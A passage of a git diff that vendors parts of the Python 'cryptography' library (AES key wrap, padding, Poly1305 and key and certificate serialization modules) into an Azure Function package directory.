verify(self, key_material: bytes, expected_key: bytes) -> None: + if not constant_time.bytes_eq(self.derive(key_material), expected_key): + raise InvalidKey diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/keywrap.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/keywrap.py new file mode 100644 index 0000000..fb46f0d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/keywrap.py @@ -0,0 +1,176 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import typing + +from cryptography.hazmat.primitives.ciphers import Cipher +from cryptography.hazmat.primitives.ciphers.algorithms import AES +from cryptography.hazmat.primitives.ciphers.modes import ECB +from cryptography.hazmat.primitives.constant_time import bytes_eq + + +def _wrap_core( + wrapping_key: bytes, + a: bytes, + r: typing.List[bytes], +) -> bytes: + # RFC 3394 Key Wrap - 2.2.1 (index method) + encryptor = Cipher(AES(wrapping_key), ECB()).encryptor() + n = len(r) + for j in range(6): + for i in range(n): + # every encryption operation is a discrete 16 byte chunk (because + # AES has a 128-bit block size) and since we're using ECB it is + # safe to reuse the encryptor for the entire operation + b = encryptor.update(a + r[i]) + a = ( + int.from_bytes(b[:8], byteorder="big") ^ ((n * j) + i + 1) + ).to_bytes(length=8, byteorder="big") + r[i] = b[-8:] + + assert encryptor.finalize() == b"" + + return a + b"".join(r) + + +def aes_key_wrap( + wrapping_key: bytes, + key_to_wrap: bytes, + backend: typing.Any = None, +) -> bytes: + if len(wrapping_key) not in [16, 24, 32]: + raise ValueError("The wrapping key must be a valid AES key length") + + if len(key_to_wrap) < 16: + raise ValueError("The key to wrap must be at least 16 bytes") + + if len(key_to_wrap) % 8 != 0: + raise ValueError("The key to wrap must be a multiple of 8 bytes") + + a = b"\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6" + r = [key_to_wrap[i : i + 8] for i in range(0, len(key_to_wrap), 8)] + return _wrap_core(wrapping_key, a, r) + + +def _unwrap_core( + wrapping_key: bytes, + a: bytes, + r: typing.List[bytes], +) -> typing.Tuple[bytes, typing.List[bytes]]: + # Implement RFC 3394 Key Unwrap - 2.2.2 (index method) + decryptor = Cipher(AES(wrapping_key), ECB()).decryptor() + n = len(r) + for j in reversed(range(6)): + for i in reversed(range(n)): + atr = ( + int.from_bytes(a, byteorder="big") ^ ((n * j) + i + 1) + ).to_bytes(length=8, byteorder="big") + r[i] + # every decryption operation is a discrete 16 byte chunk so + # it is safe to reuse the decryptor for the entire operation + b = decryptor.update(atr) + a = b[:8] + r[i] = b[-8:] + + assert decryptor.finalize() == b"" + return a, r + + +def aes_key_wrap_with_padding( + wrapping_key: bytes, + key_to_wrap: bytes, + backend: typing.Any = None, +) -> bytes: + if len(wrapping_key) not in [16, 24, 32]: + raise ValueError("The wrapping key must be a valid AES key length") + + aiv = b"\xA6\x59\x59\xA6" + len(key_to_wrap).to_bytes( + length=4, byteorder="big" + ) + # pad the key to wrap if necessary + pad = (8 - (len(key_to_wrap) % 8)) % 8 + key_to_wrap = key_to_wrap + b"\x00" * pad + if len(key_to_wrap) == 8: + # RFC 5649 - 4.1 - exactly 8 octets after padding + encryptor = Cipher(AES(wrapping_key), ECB()).encryptor() + b = encryptor.update(aiv + key_to_wrap) + assert encryptor.finalize() == b"" + return b + else: + r = [key_to_wrap[i : i + 8] for i in range(0, len(key_to_wrap), 8)] + return _wrap_core(wrapping_key, aiv, r) + + +def aes_key_unwrap_with_padding( + wrapping_key: bytes, + wrapped_key: bytes, + backend: typing.Any = None, +) -> bytes: + if len(wrapped_key) < 16: + raise InvalidUnwrap("Must be at least 16 bytes") + + if len(wrapping_key) not in [16, 24, 32]: + raise ValueError("The wrapping key must be a valid AES key length") + + if len(wrapped_key) == 16: + # RFC 5649 - 4.2 - exactly two 64-bit blocks + decryptor = Cipher(AES(wrapping_key), ECB()).decryptor() + out = decryptor.update(wrapped_key) + assert decryptor.finalize() == b"" + a = out[:8] + data = out[8:] + n = 1 + else: + r = [wrapped_key[i : i + 8] for i in range(0, len(wrapped_key), 8)] + encrypted_aiv = r.pop(0) + n = len(r) + a, r = _unwrap_core(wrapping_key, encrypted_aiv, r) + data = b"".join(r) + + # 1) Check that MSB(32,A) = A65959A6. + # 2) Check that 8*(n-1) < LSB(32,A) <= 8*n. If so, let + # MLI = LSB(32,A). + # 3) Let b = (8*n)-MLI, and then check that the rightmost b octets of + # the output data are zero. + mli = int.from_bytes(a[4:], byteorder="big") + b = (8 * n) - mli + if ( + not bytes_eq(a[:4], b"\xa6\x59\x59\xa6") + or not 8 * (n - 1) < mli <= 8 * n + or (b != 0 and not bytes_eq(data[-b:], b"\x00" * b)) + ): + raise InvalidUnwrap() + + if b == 0: + return data + else: + return data[:-b] + + +def aes_key_unwrap( + wrapping_key: bytes, + wrapped_key: bytes, + backend: typing.Any = None, +) -> bytes: + if len(wrapped_key) < 24: + raise InvalidUnwrap("Must be at least 24 bytes") + + if len(wrapped_key) % 8 != 0: + raise InvalidUnwrap("The wrapped key must be a multiple of 8 bytes") + + if len(wrapping_key) not in [16, 24, 32]: + raise ValueError("The wrapping key must be a valid AES key length") + + aiv = b"\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6" + r = [wrapped_key[i : i + 8] for i in range(0, len(wrapped_key), 8)] + a = r.pop(0) + a, r = _unwrap_core(wrapping_key, a, r) + if not bytes_eq(a, aiv): + raise InvalidUnwrap() + + return b"".join(r) + + +class InvalidUnwrap(Exception): + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/padding.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/padding.py new file mode 100644 index 0000000..ead73dc --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/padding.py @@ -0,0 +1,224 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import typing + +from cryptography import utils +from cryptography.exceptions import AlreadyFinalized +from cryptography.hazmat.bindings._rust import ( + check_ansix923_padding, + check_pkcs7_padding, +) + + +class PaddingContext(metaclass=abc.ABCMeta): + @abc.abstractmethod + def update(self, data: bytes) -> bytes: + """ + Pads the provided bytes and returns any available data as bytes. + """ + + @abc.abstractmethod + def finalize(self) -> bytes: + """ + Finalize the padding, returns bytes. + """ + + +def _byte_padding_check(block_size: int) -> None: + if not (0 <= block_size <= 2040): + raise ValueError("block_size must be in range(0, 2041).") + + if block_size % 8 != 0: + raise ValueError("block_size must be a multiple of 8.") + + +def _byte_padding_update( + buffer_: typing.Optional[bytes], data: bytes, block_size: int +) -> typing.Tuple[bytes, bytes]: + if buffer_ is None: + raise AlreadyFinalized("Context was already finalized.") + + utils._check_byteslike("data", data) + + buffer_ += bytes(data) + + finished_blocks = len(buffer_) // (block_size // 8) + + result = buffer_[: finished_blocks * (block_size // 8)] + buffer_ = buffer_[finished_blocks * (block_size // 8) :] + + return buffer_, result + + +def _byte_padding_pad( + buffer_: typing.Optional[bytes], + block_size: int, + paddingfn: typing.Callable[[int], bytes], +) -> bytes: + if buffer_ is None: + raise AlreadyFinalized("Context was already finalized.") + + pad_size = block_size // 8 - len(buffer_) + return buffer_ + paddingfn(pad_size) + + +def _byte_unpadding_update( + buffer_: typing.Optional[bytes], data: bytes, block_size: int +) -> typing.Tuple[bytes, bytes]: + if buffer_ is None: + raise AlreadyFinalized("Context was already finalized.") + + utils._check_byteslike("data", data) + + buffer_ += bytes(data) + + finished_blocks = max(len(buffer_) // (block_size // 8) - 1, 0) + + result = buffer_[: finished_blocks * (block_size // 8)] + buffer_ = buffer_[finished_blocks * (block_size // 8) :] + + return buffer_, result + + +def _byte_unpadding_check( + buffer_: typing.Optional[bytes], + block_size: int, + checkfn: typing.Callable[[bytes], int], +) -> bytes: + if buffer_ is None: + raise AlreadyFinalized("Context was already finalized.") + + if len(buffer_) != block_size // 8: + raise ValueError("Invalid padding bytes.") + + valid = checkfn(buffer_) + + if not valid: + raise ValueError("Invalid padding bytes.") + + pad_size = buffer_[-1] + return buffer_[:-pad_size] + + +class PKCS7: + def __init__(self, block_size: int): + _byte_padding_check(block_size) + self.block_size = block_size + + def padder(self) -> PaddingContext: + return _PKCS7PaddingContext(self.block_size) + + def unpadder(self) -> PaddingContext: + return _PKCS7UnpaddingContext(self.block_size) + + +class _PKCS7PaddingContext(PaddingContext): + _buffer: typing.Optional[bytes] + + def __init__(self, block_size: int): + self.block_size = block_size + # TODO: more copies than necessary, we should use zero-buffer (#193) + self._buffer = b"" + + def update(self, data: bytes) -> bytes: + self._buffer, result = _byte_padding_update( + self._buffer, data, self.block_size + ) + return result + + def _padding(self, size: int) -> bytes: + return bytes([size]) * size + + def finalize(self) -> bytes: + result = _byte_padding_pad( + self._buffer, self.block_size, self._padding + ) + self._buffer = None + return result + + +class _PKCS7UnpaddingContext(PaddingContext): + _buffer: typing.Optional[bytes] + + def __init__(self, block_size: int): + self.block_size = block_size + # TODO: more copies than necessary, we should use zero-buffer (#193) + self._buffer = b"" + + def update(self, data: bytes) -> bytes: + self._buffer, result = _byte_unpadding_update( + self._buffer, data, self.block_size + ) + return result + + def finalize(self) -> bytes: + result = _byte_unpadding_check( + self._buffer, self.block_size, check_pkcs7_padding + ) + self._buffer = None + return result + + +class ANSIX923: + def __init__(self, block_size: int): + _byte_padding_check(block_size) + self.block_size = block_size + + def padder(self) -> PaddingContext: + return _ANSIX923PaddingContext(self.block_size) + + def unpadder(self) -> PaddingContext: + return _ANSIX923UnpaddingContext(self.block_size) + + +class _ANSIX923PaddingContext(PaddingContext): + _buffer: typing.Optional[bytes] + + def __init__(self, block_size: int): + self.block_size = block_size + # TODO: more copies than necessary, we should use zero-buffer (#193) + self._buffer = b"" + + def update(self, data: bytes) -> bytes: + self._buffer, result = _byte_padding_update( + self._buffer, data, self.block_size + ) + return result + + def _padding(self, size: int) -> bytes: + return bytes([0]) * (size - 1) + bytes([size]) + + def finalize(self) -> bytes: + result = _byte_padding_pad( + self._buffer, self.block_size, self._padding + ) + self._buffer = None + return result + + +class _ANSIX923UnpaddingContext(PaddingContext): + _buffer: typing.Optional[bytes] + + def __init__(self, block_size: int): + self.block_size = block_size + # TODO: more copies than necessary, we should use zero-buffer (#193) + self._buffer = b"" + + def update(self, data: bytes) -> bytes: + self._buffer, result = _byte_unpadding_update( + self._buffer, data, self.block_size + ) + return result + + def finalize(self) -> bytes: + result = _byte_unpadding_check( + self._buffer, + self.block_size, + check_ansix923_padding, + ) + self._buffer = None + return result diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/poly1305.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/poly1305.py new file mode 100644 index 0000000..6a47f14 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/poly1305.py @@ -0,0 +1,60 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, + UnsupportedAlgorithm, + _Reasons, +) +from cryptography.hazmat.backends.openssl.poly1305 import _Poly1305Context + + +class Poly1305: + _ctx: typing.Optional[_Poly1305Context] + + def __init__(self, key: bytes): + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.poly1305_supported(): + raise UnsupportedAlgorithm( + "poly1305 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_MAC, + ) + self._ctx = backend.create_poly1305_ctx(key) + + def update(self, data: bytes) -> None: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + utils._check_byteslike("data", data) + self._ctx.update(data) + + def finalize(self) -> bytes: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + mac = self._ctx.finalize() + self._ctx = None + return mac + + def verify(self, tag: bytes) -> None: + utils._check_bytes("tag", tag) + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + + ctx, self._ctx = self._ctx, None + ctx.verify(tag) + + @classmethod + def generate_tag(cls, key: bytes, data: bytes) -> bytes: + p = Poly1305(key) + p.update(data) + return p.finalize() + + @classmethod + def verify_tag(cls, key: bytes, data: bytes, tag: bytes) -> None: + p = Poly1305(key) + p.update(data) + p.verify(tag) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__init__.py new file mode 100644 index 0000000..56acaf9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__init__.py @@ -0,0 +1,45 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +from cryptography.hazmat.primitives._serialization import ( + BestAvailableEncryption, + Encoding, + KeySerializationEncryption, + NoEncryption, + ParameterFormat, + PrivateFormat, + PublicFormat, +) +from cryptography.hazmat.primitives.serialization.base import ( + load_der_parameters, + load_der_private_key, + load_der_public_key, + load_pem_parameters, + load_pem_private_key, + load_pem_public_key, +) +from cryptography.hazmat.primitives.serialization.ssh import ( + load_ssh_private_key, + load_ssh_public_key, +) + + +__all__ = [ + "load_der_parameters", + "load_der_private_key", + "load_der_public_key", + "load_pem_parameters", + "load_pem_private_key", + "load_pem_public_key", + "load_ssh_private_key", + "load_ssh_public_key", + "Encoding", + "PrivateFormat", + "PublicFormat", + "ParameterFormat", + "KeySerializationEncryption", + "BestAvailableEncryption", + "NoEncryption", +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..f18a71d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/base.cpython-39.pyc new file mode 100644 index 0000000..d3d46b7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/pkcs12.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/pkcs12.cpython-39.pyc new file mode 100644 index 0000000..7bc480c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/pkcs12.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/pkcs7.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/pkcs7.cpython-39.pyc new file mode 100644 index 0000000..38fcba3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/pkcs7.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/ssh.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/ssh.cpython-39.pyc new file mode 100644 index 0000000..c50851a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/__pycache__/ssh.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/base.py new file mode 100644 index 0000000..75d604a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/base.py @@ -0,0 +1,64 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import typing + +from cryptography.hazmat.primitives.asymmetric import dh +from cryptography.hazmat.primitives.asymmetric.types import ( + PRIVATE_KEY_TYPES, + PUBLIC_KEY_TYPES, +) + + +def load_pem_private_key( + data: bytes, + password: typing.Optional[bytes], + backend: typing.Any = None, +) -> PRIVATE_KEY_TYPES: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.load_pem_private_key(data, password) + + +def load_pem_public_key( + data: bytes, backend: typing.Any = None +) -> PUBLIC_KEY_TYPES: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.load_pem_public_key(data) + + +def load_pem_parameters( + data: bytes, backend: typing.Any = None +) -> "dh.DHParameters": + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.load_pem_parameters(data) + + +def load_der_private_key( + data: bytes, + password: typing.Optional[bytes], + backend: typing.Any = None, +) -> PRIVATE_KEY_TYPES: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.load_der_private_key(data, password) + + +def load_der_public_key( + data: bytes, backend: typing.Any = None +) -> PUBLIC_KEY_TYPES: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.load_der_public_key(data) + + +def load_der_parameters( + data: bytes, backend: typing.Any = None +) -> "dh.DHParameters": + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.load_der_parameters(data) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/pkcs12.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/pkcs12.py new file mode 100644 index 0000000..f3c1487 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/pkcs12.py @@ -0,0 +1,219 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography import x509 +from cryptography.hazmat.primitives import serialization +from cryptography.hazmat.primitives.asymmetric import ( + dsa, + ec, + ed25519, + ed448, + rsa, +) +from cryptography.hazmat.primitives.asymmetric.types import ( + PRIVATE_KEY_TYPES, +) + + +_ALLOWED_PKCS12_TYPES = typing.Union[ + rsa.RSAPrivateKey, + dsa.DSAPrivateKey, + ec.EllipticCurvePrivateKey, + ed25519.Ed25519PrivateKey, + ed448.Ed448PrivateKey, +] + + +class PKCS12Certificate: + def __init__( + self, + cert: x509.Certificate, + friendly_name: typing.Optional[bytes], + ): + if not isinstance(cert, x509.Certificate): + raise TypeError("Expecting x509.Certificate object") + if friendly_name is not None and not isinstance(friendly_name, bytes): + raise TypeError("friendly_name must be bytes or None") + self._cert = cert + self._friendly_name = friendly_name + + @property + def friendly_name(self) -> typing.Optional[bytes]: + return self._friendly_name + + @property + def certificate(self) -> x509.Certificate: + return self._cert + + def __eq__(self, other: object) -> bool: + if not isinstance(other, PKCS12Certificate): + return NotImplemented + + return ( + self.certificate == other.certificate + and self.friendly_name == other.friendly_name + ) + + def __hash__(self) -> int: + return hash((self.certificate, self.friendly_name)) + + def __repr__(self) -> str: + return "".format( + self.certificate, self.friendly_name + ) + + +class PKCS12KeyAndCertificates: + def __init__( + self, + key: typing.Optional[PRIVATE_KEY_TYPES], + cert: typing.Optional[PKCS12Certificate], + additional_certs: typing.List[PKCS12Certificate], + ): + if key is not None and not isinstance( + key, + ( + rsa.RSAPrivateKey, + dsa.DSAPrivateKey, + ec.EllipticCurvePrivateKey, + ed25519.Ed25519PrivateKey, + ed448.Ed448PrivateKey, + ), + ): + raise TypeError( + "Key must be RSA, DSA, EllipticCurve, ED25519, or ED448" + " private key, or None." + ) + if cert is not None and not isinstance(cert, PKCS12Certificate): + raise TypeError("cert must be a PKCS12Certificate object or None") + if not all( + isinstance(add_cert, PKCS12Certificate) + for add_cert in additional_certs + ): + raise TypeError( + "all values in additional_certs must be PKCS12Certificate" + " objects" + ) + self._key = key + self._cert = cert + self._additional_certs = additional_certs + + @property + def key(self) -> typing.Optional[PRIVATE_KEY_TYPES]: + return self._key + + @property + def cert(self) -> typing.Optional[PKCS12Certificate]: + return self._cert + + @property + def additional_certs(self) -> typing.List[PKCS12Certificate]: + return self._additional_certs + + def __eq__(self, other: object) -> bool: + if not isinstance(other, PKCS12KeyAndCertificates): + return NotImplemented + + return ( + self.key == other.key + and self.cert == other.cert + and self.additional_certs == other.additional_certs + ) + + def __hash__(self) -> int: + return hash((self.key, self.cert, tuple(self.additional_certs))) + + def __repr__(self) -> str: + fmt = ( + "" + ) + return fmt.format(self.key, self.cert, self.additional_certs) + + +def load_key_and_certificates( + data: bytes, + password: typing.Optional[bytes], + backend: typing.Any = None, +) -> typing.Tuple[ + typing.Optional[PRIVATE_KEY_TYPES], + typing.Optional[x509.Certificate], + typing.List[x509.Certificate], +]: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.load_key_and_certificates_from_pkcs12(data, password) + + +def load_pkcs12( + data: bytes, + password: typing.Optional[bytes], + backend: typing.Any = None, +) -> PKCS12KeyAndCertificates: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.load_pkcs12(data, password) + + +_PKCS12_CAS_TYPES = typing.Union[ + x509.Certificate, + PKCS12Certificate, +] + + +def serialize_key_and_certificates( + name: typing.Optional[bytes], + key: typing.Optional[_ALLOWED_PKCS12_TYPES], + cert: typing.Optional[x509.Certificate], + cas: typing.Optional[typing.Iterable[_PKCS12_CAS_TYPES]], + encryption_algorithm: serialization.KeySerializationEncryption, +) -> bytes: + if key is not None and not isinstance( + key, + ( + rsa.RSAPrivateKey, + dsa.DSAPrivateKey, + ec.EllipticCurvePrivateKey, + ed25519.Ed25519PrivateKey, + ed448.Ed448PrivateKey, + ), + ): + raise TypeError( + "Key must be RSA, DSA, EllipticCurve, ED25519, or ED448" + " private key, or None." + ) + if cert is not None and not isinstance(cert, x509.Certificate): + raise TypeError("cert must be a certificate or None") + + if cas is not None: + cas = list(cas) + if not all( + isinstance( + val, + ( + x509.Certificate, + PKCS12Certificate, + ), + ) + for val in cas + ): + raise TypeError("all values in cas must be certificates") + + if not isinstance( + encryption_algorithm, serialization.KeySerializationEncryption + ): + raise TypeError( + "Key encryption algorithm must be a " + "KeySerializationEncryption instance" + ) + + if key is None and cert is None and not cas: + raise ValueError("You must supply at least one of key, cert, or cas") + + from cryptography.hazmat.backends.openssl.backend import backend + + return backend.serialize_key_and_certificates_to_pkcs12( + name, key, cert, cas, encryption_algorithm + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/pkcs7.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/pkcs7.py new file mode 100644 index 0000000..db3ac8a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/pkcs7.py @@ -0,0 +1,180 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography import utils +from cryptography import x509 +from cryptography.hazmat.primitives import hashes, serialization +from cryptography.hazmat.primitives.asymmetric import ec, rsa +from cryptography.utils import _check_byteslike + + +def load_pem_pkcs7_certificates(data: bytes) -> typing.List[x509.Certificate]: + from cryptography.hazmat.backends.openssl.backend import backend + + return backend.load_pem_pkcs7_certificates(data) + + +def load_der_pkcs7_certificates(data: bytes) -> typing.List[x509.Certificate]: + from cryptography.hazmat.backends.openssl.backend import backend + + return backend.load_der_pkcs7_certificates(data) + + +def serialize_certificates( + certs: typing.List[x509.Certificate], + encoding: serialization.Encoding, +) -> bytes: + from cryptography.hazmat.backends.openssl.backend import backend + + return backend.pkcs7_serialize_certificates(certs, encoding) + + +_ALLOWED_PKCS7_HASH_TYPES = typing.Union[ + hashes.SHA1, + hashes.SHA224, + hashes.SHA256, + hashes.SHA384, + hashes.SHA512, +] + +_ALLOWED_PRIVATE_KEY_TYPES = typing.Union[ + rsa.RSAPrivateKey, ec.EllipticCurvePrivateKey +] + + +class PKCS7Options(utils.Enum): + Text = "Add text/plain MIME type" + Binary = "Don't translate input data into canonical MIME format" + DetachedSignature = "Don't embed data in the PKCS7 structure" + NoCapabilities = "Don't embed SMIME capabilities" + NoAttributes = "Don't embed authenticatedAttributes" + NoCerts = "Don't embed signer certificate" + + +class PKCS7SignatureBuilder: + def __init__( + self, + data: typing.Optional[bytes] = None, + signers: typing.List[ + typing.Tuple[ + x509.Certificate, + _ALLOWED_PRIVATE_KEY_TYPES, + _ALLOWED_PKCS7_HASH_TYPES, + ] + ] = [], + additional_certs: typing.List[x509.Certificate] = [], + ): + self._data = data + self._signers = signers + self._additional_certs = additional_certs + + def set_data(self, data: bytes) -> "PKCS7SignatureBuilder": + _check_byteslike("data", data) + if self._data is not None: + raise ValueError("data may only be set once") + + return PKCS7SignatureBuilder(data, self._signers) + + def add_signer( + self, + certificate: x509.Certificate, + private_key: _ALLOWED_PRIVATE_KEY_TYPES, + hash_algorithm: _ALLOWED_PKCS7_HASH_TYPES, + ) -> "PKCS7SignatureBuilder": + if not isinstance( + hash_algorithm, + ( + hashes.SHA1, + hashes.SHA224, + hashes.SHA256, + hashes.SHA384, + hashes.SHA512, + ), + ): + raise TypeError( + "hash_algorithm must be one of hashes.SHA1, SHA224, " + "SHA256, SHA384, or SHA512" + ) + if not isinstance(certificate, x509.Certificate): + raise TypeError("certificate must be a x509.Certificate") + + if not isinstance( + private_key, (rsa.RSAPrivateKey, ec.EllipticCurvePrivateKey) + ): + raise TypeError("Only RSA & EC keys are supported at this time.") + + return PKCS7SignatureBuilder( + self._data, + self._signers + [(certificate, private_key, hash_algorithm)], + ) + + def add_certificate( + self, certificate: x509.Certificate + ) -> "PKCS7SignatureBuilder": + if not isinstance(certificate, x509.Certificate): + raise TypeError("certificate must be a x509.Certificate") + + return PKCS7SignatureBuilder( + self._data, self._signers, self._additional_certs + [certificate] + ) + + def sign( + self, + encoding: serialization.Encoding, + options: typing.Iterable[PKCS7Options], + backend: typing.Any = None, + ) -> bytes: + if len(self._signers) == 0: + raise ValueError("Must have at least one signer") + if self._data is None: + raise ValueError("You must add data to sign") + options = list(options) + if not all(isinstance(x, PKCS7Options) for x in options): + raise ValueError("options must be from the PKCS7Options enum") + if encoding not in ( + serialization.Encoding.PEM, + serialization.Encoding.DER, + serialization.Encoding.SMIME, + ): + raise ValueError( + "Must be PEM, DER, or SMIME from the Encoding enum" + ) + + # Text is a meaningless option unless it is accompanied by + # DetachedSignature + if ( + PKCS7Options.Text in options + and PKCS7Options.DetachedSignature not in options + ): + raise ValueError( + "When passing the Text option you must also pass " + "DetachedSignature" + ) + + if PKCS7Options.Text in options and encoding in ( + serialization.Encoding.DER, + serialization.Encoding.PEM, + ): + raise ValueError( + "The Text option is only available for SMIME serialization" + ) + + # No attributes implies no capabilities so we'll error if you try to + # pass both. + if ( + PKCS7Options.NoAttributes in options + and PKCS7Options.NoCapabilities in options + ): + raise ValueError( + "NoAttributes is a superset of NoCapabilities. Do not pass " + "both values." + ) + + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.pkcs7_sign(self, encoding, options) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/ssh.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/ssh.py new file mode 100644 index 0000000..4b50c8d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/serialization/ssh.py @@ -0,0 +1,757 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import binascii +import os +import re +import typing +from base64 import encodebytes as _base64_encode + +from cryptography import utils +from cryptography.exceptions import UnsupportedAlgorithm +from cryptography.hazmat.primitives.asymmetric import dsa, ec, ed25519, rsa +from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes +from cryptography.hazmat.primitives.serialization import ( + Encoding, + NoEncryption, + PrivateFormat, + PublicFormat, +) + +try: + from bcrypt import kdf as _bcrypt_kdf + + _bcrypt_supported = True +except ImportError: + _bcrypt_supported = False + + def _bcrypt_kdf( + password: bytes, + salt: bytes, + desired_key_bytes: int, + rounds: int, + ignore_few_rounds: bool = False, + ) -> bytes: + raise UnsupportedAlgorithm("Need bcrypt module") + + +_SSH_ED25519 = b"ssh-ed25519" +_SSH_RSA = b"ssh-rsa" +_SSH_DSA = b"ssh-dss" +_ECDSA_NISTP256 = b"ecdsa-sha2-nistp256" +_ECDSA_NISTP384 = b"ecdsa-sha2-nistp384" +_ECDSA_NISTP521 = b"ecdsa-sha2-nistp521" +_CERT_SUFFIX = 